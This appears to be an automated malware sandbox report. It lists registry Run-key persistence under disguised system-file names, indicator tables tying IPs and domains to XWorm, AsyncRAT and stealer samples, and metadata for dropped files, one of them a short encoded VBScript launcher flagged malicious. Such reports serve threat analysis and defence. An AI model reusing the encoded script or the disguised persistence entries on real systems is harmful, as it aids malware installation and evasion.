                            13:33:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                            13:33:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                            13:33:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Windows\addins\cmd.exe"
                            13:33:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Windows\apppatch\en-US\conhost.exe"
                            13:34:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
                            13:34:12AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\SysWOW64\it-IT\dasHost.exe"
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.13.bin.exeGet hashmaliciousGo InjectorBrowse
                            • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                            raw.ps1Get hashmaliciousUnknownBrowse
                            • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                            #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                            • ip-api.com/json/?fields=225545
                            NaOH.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                            • ip-api.com/json/?fields=225545
                            XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                            • ip-api.com/line/?fields=hosting
                            setup.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                            • ip-api.com/json/?fields=225545
                            147.185.221.21setup.exeGet hashmaliciousXWormBrowse
                              Inject.exeGet hashmaliciousXWormBrowse
                                setup.exeGet hashmaliciousAsyncRATBrowse
                                  svchost23.exeGet hashmaliciousAsyncRATBrowse
                                    Nursultan Alpha (perm).exeGet hashmaliciousXWormBrowse
                                      ApVIkOzaxh.exeGet hashmaliciousNjratBrowse
                                        Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                                          Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                                            6zYXga5dPH.exeGet hashmaliciousNjratBrowse
                                              qkLSlx42As.exeGet hashmaliciousNjratBrowse
                                                185.199.108.133http://rapbuki.sga.dom.my.id/aaaGet hashmaliciousUnknownBrowse
                                                  https://pancake-swap-live-rknx.vercel.app/Get hashmaliciousUnknownBrowse
                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                      m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                        m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                          http://tok2np0ckht.top/Get hashmaliciousHTMLPhisherBrowse
                                                            Updated Handbook.docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                              SecuriteInfo.com.Trojan.WinGo.Ranumbot.18140.30614.exeGet hashmaliciousUnknownBrowse
                                                                https://profiles.secure-dashboard-ours.workers.dev/v3/helpGet hashmaliciousHTMLPhisherBrowse
                                                                  0d77da1e-ab68-7c71-dba6-5041121b78e5.emlGet hashmaliciousTycoon2FABrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    discordapp.comhttp://dc.tensgpt.com/branding/Get hashmaliciousUnknownBrowse
                                                                    • 162.159.129.233
                                                                    https://dc.tensgpt.com/Get hashmaliciousUnknownBrowse
                                                                    • 162.159.135.233
                                                                    http://rapbuki.sga.dom.my.id/aaaGet hashmaliciousUnknownBrowse
                                                                    • 162.159.133.233
                                                                    receipt-016.vbsGet hashmaliciousRemcos, AsyncRAT, XWormBrowse
                                                                    • 162.159.133.233
                                                                    Estratto Conto.docmGet hashmaliciousUnknownBrowse
                                                                    • 162.159.129.233
                                                                    Estratto Conto.docmGet hashmaliciousUnknownBrowse
                                                                    • 162.159.134.233
                                                                    Estratto Conto.docmGet hashmaliciousUnknownBrowse
                                                                    • 162.159.135.233
                                                                    Built.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • 162.159.135.233
                                                                    http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                                                    • 162.159.129.233
                                                                    http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                                                    • 162.159.129.233
                                                                    ip-api.com3.bin.exeGet hashmaliciousGo InjectorBrowse
                                                                    • 208.95.112.1
                                                                    raw.ps1Get hashmaliciousUnknownBrowse
                                                                    • 208.95.112.1
                                                                    #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • 208.95.112.1
                                                                    NaOH.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                    • 208.95.112.1
                                                                    XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.95.112.1
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 208.95.112.1
                                                                    setup.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                                                                    • 208.95.112.1
                                                                    github.com551775-ZAM-6-6-2024.jarGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    PO-240722THP.jarGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                                    • 140.82.121.4
                                                                    Updater.lnkGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    DTC.htaGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.3
                                                                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                                    • 140.82.121.3
                                                                    http://rapbuki.sga.dom.my.id/aaaGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.3
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 140.82.121.4
                                                                    Setup.exeGet hashmaliciousVidarBrowse
                                                                    • 140.82.121.4
                                                                    Updated Handbook.docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 140.82.121.3
                                                                    raw.githubusercontent.comCV.vbsGet hashmaliciousXmrigBrowse
                                                                    • 185.199.110.133
                                                                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                                    • 185.199.110.133
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 185.199.108.133
                                                                    Setup.exeGet hashmaliciousVidarBrowse
                                                                    • 185.199.110.133
                                                                    m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                    • 185.199.108.133
                                                                    m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                    • 185.199.108.133
                                                                    SecuriteInfo.com.Trojan.WinGo.Ranumbot.18140.30614.exeGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    https://profiles.secure-dashboard-ours.workers.dev/v3/helpGet hashmaliciousHTMLPhisherBrowse
                                                                    • 185.199.108.133
                                                                    https://profiles.secure-dashboard-ours.workers.dev/v3/sitemapGet hashmaliciousHTMLPhisherBrowse
                                                                    • 185.199.109.133
                                                                    Loader v_1.27.exeGet hashmaliciousLummaCBrowse
                                                                    • 185.199.111.133
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TUT-ASUS3.bin.exeGet hashmaliciousGo InjectorBrowse
                                                                    • 208.95.112.1
                                                                    raw.ps1Get hashmaliciousUnknownBrowse
                                                                    • 208.95.112.1
                                                                    #U202f#U202f#U2005#U00a0.scr.exeGet hashmaliciousBlank GrabberBrowse
                                                                    • 208.95.112.1
                                                                    NaOH.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                    • 208.95.112.1
                                                                    XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                    • 208.95.112.1
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 208.95.112.1
                                                                    setup.exeGet hashmaliciousXWormBrowse
                                                                    • 208.95.112.1
                                                                    Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                                                                    • 208.95.112.1
                                                                    GITHUBUS551775-ZAM-6-6-2024.jarGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    PO-240722THP.jarGet hashmaliciousSTRRATBrowse
                                                                    • 140.82.121.4
                                                                    PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                                    • 140.82.121.4
                                                                    Updater.lnkGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    DTC.htaGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.3
                                                                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                                    • 140.82.121.4
                                                                    http://rapbuki.sga.dom.my.id/aaaGet hashmaliciousUnknownBrowse
                                                                    • 140.82.121.4
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 140.82.121.4
                                                                    Setup.exeGet hashmaliciousVidarBrowse
                                                                    • 140.82.121.4
                                                                    http://tok2np0ckht.top/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 140.82.121.6
                                                                    SALSGIVERUSFUDE.bin.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.17
                                                                    SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                    • 147.185.221.20
                                                                    Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                    • 147.185.221.20
                                                                    system47.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.18
                                                                    setup.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.17
                                                                    setup.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.21
                                                                    Inject.exeGet hashmaliciousXWormBrowse
                                                                    • 147.185.221.21
                                                                    m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                    • 147.185.221.20
                                                                    m427dF0Ztr.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                    • 147.185.221.20
                                                                    6CDY0k02s7.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 147.185.221.19
                                                                    FASTLYUShttp://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.132
                                                                    https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0Get hashmaliciousPhisherBrowse
                                                                    • 199.232.188.159
                                                                    https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3DGet hashmaliciousUnknownBrowse
                                                                    • 151.101.0.114
                                                                    View Invoice#98783859 Statement for dpo.lu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.2.137
                                                                    http://ib.adnxs.com/getuid?https%3a%2f%2famoudfoundation.com/ath80023211800id-4765445b-32c6-49b0-83e6-1d93765276ca#Gcharteip@daiichi-sankyo.frGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    CV.vbsGet hashmaliciousXmrigBrowse
                                                                    • 185.199.110.133
                                                                    file.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.129.229
                                                                    receipt.ACH.No71124.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.2.137
                                                                    https://forms.office.com/Pages/ResponsePage.aspx?id=mZB7T0Dtr0mx-Js9AsqUvjkKVGExcKpLpLje28x2_kZUOVA4UU9WT0pSQUFPSTZPUlhWTElINUNETy4uGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.130.110
                                                                    551775-ZAM-6-6-2024.jarGet hashmaliciousSTRRATBrowse
                                                                    • 199.232.192.209
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0edoc_RFQ NEW ORDER #2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    TVC4030004.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    kFVFbXvmmW.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0Get hashmaliciousPhisherBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    Payment receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/Get hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    009347280261.AWB.PEK.CO.227.20200508.240751.20200507.230805.22162.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    http://lmctgiveaway.comGet hashmaliciousUnknownBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    SOF Documents PDF.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse
                                                                    • 185.199.108.133
                                                                    • 140.82.121.4
                                                                    No context
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with very long lines (701), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):701
                                                                    Entropy (8bit):5.898668975829818
                                                                    Encrypted:false
                                                                    SSDEEP:12:qtkKNJiJpqolwLQKvelg6Recm8ZnQp3LTCv/GrcaR9AlGEbA7IgRLZdA:WtaJpqewcK2nReB6k7TCvOr//AMdO
                                                                    MD5:DAC81F843079367B451C5A5F4F247120
                                                                    SHA1:4EF901C26894F08C1E8FB874C22AFBBC233A4DF1
                                                                    SHA-256:2393FAE4A85C19250E87FE141C9E6FA67B0D227BFB23B0532CEF1942363EB7A1
                                                                    SHA-512:D821C72A86EEE34B388542771E6AC04253D49D41D87F2239EC4D9A551E6D765919CE7FECBE635BEDCEE54433709018C40CC5AC7C53D48F33128A9B2665054A0B
                                                                    Malicious:false
                                                                    Preview:Bgei07OqiUyoXbOVNHk8LVmG1Vbt6iY3FmizemRbqJ31c4eu78NAiogq4XqfgetA65iu2Z0l0JRBbuo70qv8VYUaG24H5v5LZ35hVu1iHmKYWeOKttpztvpikHnAftpENGlizGlGzN0sO5EmnuXLGGcoOW7NH1DY6FLQ3pUnIjAf56UoDAXvWe8Hn7UcJX87KcwIuyt7ZuDgG6sRCSKGeSCcHDm5V1eukCVdKL3PRZVmabBqODa0N2d2aTBrMxmhPT6DlPH0Z5yE6aBpC5rSbnhricD0KMDexxWHf7F85jbSDZ59RWpQFUFlvOeJMRqM2URID4JE0sW2MPnJhDiyhwYcsuVRd6wo2OZtIw6XMlaX7NZgkVmIs2pF6yaTi1k46s98z4BuHLl6VAfeVzrIUn5AiUxTWmyUAgbPNarpT1BhQtt5T58tKckSw9afHrXeWQ5zjPR4HBycmYtyk1AanEKh5IcNAMilegKAx4VDnEmJoIqYPl4Pq71SGY3awD45cM7FNtBqf6wjcA3xcE8YRS4gp23ZA4RjJqqbKlKgjOttKRzGfG8rFfoJRbZVzmplpMawTbn13bzCjKVYCx446jeoBgJtLzq7jIE81DwDcHyoqmkGFBSCrvoGswuxS4pDu1daGXg9B1byuz7Z6CnKhoQxd7PFS9uicu3zIKAreTA0T0V2yV0PQegGlp6IH
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchosts.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):209
                                                                    Entropy (8bit):5.808697125492428
                                                                    Encrypted:false
                                                                    SSDEEP:6:GxWvwqK+NkLzWbHE08nZNDd3RL1wQJRd7JFx51a0gE7:GxFMCzWLE04d3XBJTJ3Tr
                                                                    MD5:9D6989EAC870B2CBC9B6E9E296095D92
                                                                    SHA1:0A0274A365E57FD557A6F41E283C83D72E9D4649
                                                                    SHA-256:514FA0DFD0C1E3522E5482D7D68FD1B0EE2FA66AA6B8286FD9D1815D6B9B0897
                                                                    SHA-512:59FAB44506F38C1E8EF0FEDA5DAB0F6C48D78F41BDB3C8DE32A511060FA852102A4639A9ACC97F684EC8CFEF5EA5E7BB6C359C05C899CDB6377BC97834725723
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.K3.DmMYJG;\F3Iw\.C`y5~K,dWEF1F;c4mYE~~TBPWl^d+EzoAAA==^#~@.
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchosts.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchosts.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):35
                                                                    Entropy (8bit):4.050013373778756
                                                                    Encrypted:false
                                                                    SSDEEP:3:I5XsGXR52afdAHn:I9RnE
                                                                    MD5:78DD1DB923645314CFD8F7ECB5394E3D
                                                                    SHA1:4C4379B4A63A4932E676D49A0914E3E8F55EE938
                                                                    SHA-256:D081581275BB5B7830C1D6C4795A8C8CB65C1BDBB16C4A8206727565E1951622
                                                                    SHA-512:A7A9CB1B9DE9E349EFE38B5B0DBDFCEDF40BD2EE345DA641EAA67686C1C9F8E64F89FDB10BF588992A6CA42F52EB8DB68D8E5C4B8CCE78A4A8BFD938523FC23C
                                                                    Malicious:true
                                                                    Preview:"C:\Brokercrt\comReviewsession.exe"
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):52
                                                                    Entropy (8bit):5.094482506519422
                                                                    Encrypted:false
                                                                    SSDEEP:3:upzKzZ6JbRTT:upmzZ6r
                                                                    MD5:CBDA4E52061DB3DC50FBBE0346A93B62
                                                                    SHA1:FA930972A45CFE272709AB663A165AF2B6E6EEA1
                                                                    SHA-256:E1C1E44D7734FA55A930D94CC0007CFCC8987CC09529E58E185884956325AF08
                                                                    SHA-512:6D3C3DD5E26D12CF819473FADE0F8FCB3DEFDBA592BA8320DB097B77633FF065498D6400DABD6467703DF48445B1CE1CB1B4637A0272488FDE8F765C74F45AC0
                                                                    Malicious:false
                                                                    Preview:3FeruLV9oQqUXZ3tDclVlFNFp54lHljKQcOomxi323fk8ngTAbV6
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):297
                                                                    Entropy (8bit):5.787555171427131
                                                                    Encrypted:false
                                                                    SSDEEP:6:WYjxSD24eL63HZi0/MXUCZW0RQ8DK62/2zYS8AnNRzwl+gj1o:yDFeLWX0EqlW9+NRn
                                                                    MD5:F4AB5421948633684C129DF7FBB0CCF1
                                                                    SHA1:E57352DB87F013CB0D796F22E5E10B3712D10261
                                                                    SHA-256:99D9E89FCDD839B5B587CF0F266AB1321BE55948EF4DD10A2D0497C22DC99DD9
                                                                    SHA-512:4C1015EB843D8EAD40954DB119F695A58606B2D270C7ED7C0BCA28C1514156DE1D99FF53DB714449F71568E21301AC87B6815F17BC6B192A64F8CF4952C85E21
                                                                    Malicious:false
                                                                    Preview:rEFVpPB1ojMPoS5ARHtLkepgL7QvLVKhAot3vw9YpFCcj2qzkQf4MtrNZjKr8PpTZpO9iBPeIVgfcN6SRbK5zQUR7geLmRZZasD4oqQjBAw1NMvMm1ahFueIU7CCgD206GFtJCokKl3yedEvvRju01UpN4kqoOC7H55GHBCkMzXd0po03QQPeIAEwZgPc765i6qji7ouO9hBe0yhPtxX8wd940TrfxIP2b549FS5mgAfk9k6k89sJj7vcqorn6Pb0SIC54iKa2ubw8Z5QXHgxZFTeJbSblRqRjoS0iBqZ
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with very long lines (588), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):588
                                                                    Entropy (8bit):5.870890544208266
                                                                    Encrypted:false
                                                                    SSDEEP:12:QhcS9jJCAFmJejAP8/41kxq8STdLG3y4kxH+chB:Q39jePE/4q56GC4XQ
                                                                    MD5:128EAEFEC8AFA70E0E8F508AF3649D5F
                                                                    SHA1:7BBE643795ECA13010C64669B2BE26F240BC1D58
                                                                    SHA-256:81FAE81BC299D2E0C4B39BE83EDA755999D77E85DE9BF69D4CB51943EADE626A
                                                                    SHA-512:04EFF503980CF8EA9904F60E00D0E6ECF2BEAEE690F96C74579CCDBCA56E3E8127462FD785279D697371D93BAA552BD9AD3E85E9012407279CB9686FF5218A03
                                                                    Malicious:false
